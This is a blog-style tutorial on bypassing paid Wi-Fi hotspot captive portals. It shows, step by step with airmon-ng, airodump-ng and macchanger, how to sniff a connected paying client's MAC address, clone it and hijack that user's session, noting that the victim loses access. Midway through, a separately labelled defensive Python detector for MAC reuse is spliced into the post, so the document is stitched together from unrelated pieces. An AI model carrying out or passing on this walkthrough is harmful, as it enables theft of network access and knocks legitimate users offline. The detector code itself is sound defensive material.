If you are like me, you hate paying these hotspots or giving them unnecessary info, for security reasons. You might like what I am about to share with you. Here is a simple technique to bypass the landing page. Landing pages are basically authentication gateways: once valid credentials have been presented, your MAC/physical address is allowed through. As long as your MAC/physical address doesn't change, you will be granted access to the Web.
Simple Bypass Technique
For this technique to work, you will need to spoof your MAC address. First, you will need to identify a *cough* paying *cough* client that is already connected to the hotspot, then steal his MAC/physical address by spoofing it.
Here are the steps. You will need Linux with airmon-ng, macchanger and airodump-ng. I use Kali, and all of them are bundled.
Start the monitoring on wlan0:
# airmon-ng start wlan0
Your wlan0 should go into monitor mode. Now you can check for valid SSIDs:
# airodump-ng wlan0mon
CH 11 ][ Elapsed: 36 s ][ 2018-04-04 22:37
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:E3:D6:23:A3:C0 -1 0 2 0 6 -1 OPN <length: 0>
40:E3:D6:23:E2:61 -1 0 3 0 6 -1 OPN <length: 0>
F0:5C:19:85:65:62 -53 26 29 0 6 54e. OPN WE WiFi
F0:5C:19:85:65:63 -53 27 0 0 6 54e. OPN aamra WiFi
F0:5C:19:85:65:60 -53 33 0 0 6 54e. WPA2 CCMP PSK <length: 0>
F0:5C:19:85:65:61 -54 28 402 0 6 54e. OPN SKYLOUNGE
40:16:7E:BA:44:10 -62 35 17 0 11 54e WPA2 CCMP PSK K-LOUNGE
E0:91:F5:7D:E7:A4 -65 22 0 0 6 54e WPA2 CCMP PSK icon_Lounge_Wi-Fi
00:6C:BC:EE:8A:E3 -65 32 1 0 11 54e WPA2 CCMP PSK MTB-AIR-LOUNGE WI-FI
88:D7:F6:04:C5:50 -71 18 171 0 6 54e WPA2 CCMP PSK EK_SALES01
DA:0F:99:1C:E1:55 -73 15 0 0 6 54e WPA2 CCMP PSK DIRECT-RC-BRAVIA
I'm going to target aamra WiFi. First, connect to the SSID:
# airodump-ng --bssid 'F0:5C:19:85:65:63' wlan0mon
From here, take note of the clients that are already connected and choose your victim to hijack:
CH 7 ][ Elapsed: 24 s ][ 2018-04-04 23:05
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:5C:19:85:65:63 -59 24 99 2 6 54e. OPN aamra WiFi
BSSID STATION PWR Rate Lost Frames Probe
F0:5C:19:85:65:63 70:8B:CD:0B:CC:42 -32 0e- 6e 69 101
You can stop monitoring the Wi-Fi:
# airmon-ng stop wlan0mon
# ifconfig wlan0 down
Now change your MAC address and bring the interface back up:
# macchanger -m 70:8B:CD:0B:CC:42 wlan0
Current MAC: f8:34:41:5d:89:ce (unknown)
Permanent MAC: f8:34:41:5d:89:ce (unknown)
New MAC: 70:8b:cd:0b:cc:42 (unknown)
# ifconfig wlan0 up
# ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.208.113.56 netmask 255.255.240.0 broadcast 10.208.127.255
ether 70:8b:cd:0b:cc:42 txqueuelen 1000 (Ethernet)
RX packets 41 bytes 8537 (8.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 75 bytes 12831 (12.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Get a new IP addr:
# dhclient wlan0
And you are now good to go!! I recommend keeping a continuous ping to an Internet address to keep your connection alive. The hijacked victim will not be able to connect unless you stop communicating.
There are other fancier techniques, such as tunneling through DNS or ICMP traffic. Perhaps I can cover those in the future.
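Seen from the hotspot operator's side, a gateway that authorizes by MAC alone can still notice when the device behind an authorized MAC changes. The following is an added example, not part of the original post: it compares the DHCP fingerprint (options 12, 55 and 60) of each request against the device that logged in with that MAC. The event structure, function names and all sample values except the MAC from the capture above are constructed assumptions.

```python
from dataclasses import dataclass

FIELDS = ("hostname", "params", "vendor")

@dataclass(frozen=True)
class DhcpEvent:
    ts: int        # seconds since start of the constructed log
    mac: str       # client hardware address
    hostname: str  # DHCP option 12
    params: tuple  # DHCP option 55, parameter request list
    vendor: str    # DHCP option 60, vendor class identifier

def fingerprint(ev):
    return (ev.hostname.lower(), ev.params, ev.vendor)

def find_mac_reuse(portal_logins, events):
    """Return (ts, mac, changed_fields) for each DHCP request whose fingerprint
    differs from the device that logged in to the portal with that MAC."""
    logins = {mac.lower(): ts for mac, ts in portal_logins.items()}
    baseline, alerts = {}, []
    for ev in sorted(events, key=lambda e: e.ts):
        mac = ev.mac.lower()
        if mac not in logins:
            continue  # never authorized, so the gateway still blocks it
        fp = fingerprint(ev)
        if ev.ts <= logins[mac] or mac not in baseline:
            baseline[mac] = fp  # what the authenticating device looked like
        elif fp != baseline[mac]:
            changed = [f for f, old, new in zip(FIELDS, baseline[mac], fp) if old != new]
            alerts.append((ev.ts, mac, changed))
    return alerts

# Constructed sample data: MAC from the capture above; other values are made up.
LOGINS = {"70:8B:CD:0B:CC:42": 120, "AA:BB:CC:00:00:01": 300}
EVENTS = [
    DhcpEvent(100, "70:8b:cd:0b:cc:42", "guest-phone", (1, 3, 6, 15), "vendor-a"),
    DhcpEvent(280, "aa:bb:cc:00:00:01", "laptop-7", (1, 3, 6), "vendor-b"),
    DhcpEvent(900, "70:8b:cd:0b:cc:42", "other-host", (1, 28, 2, 3), "vendor-c"),
    DhcpEvent(950, "aa:bb:cc:00:00:01", "laptop-7", (1, 3, 6), "vendor-b"),  # renewal
    DhcpEvent(960, "de:ad:be:ef:00:02", "unauth", (1, 3), "vendor-d"),
]

if __name__ == "__main__":
    for ts, mac, changed in find_mac_reuse(LOGINS, EVENTS):
        print(f"t={ts}s {mac}: DHCP fingerprint changed ({', '.join(changed)}); force re-login")
```

A fingerprint change is a reason to send the client back to the landing page, not proof of misuse: a legitimate user who reboots into another OS triggers it too.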
Enjoy! ;-)
*Disclaimer: I take no responsibility for any unlawful or legal repercussion that might occur as a result of your action. This post is intended for educational purposes only.


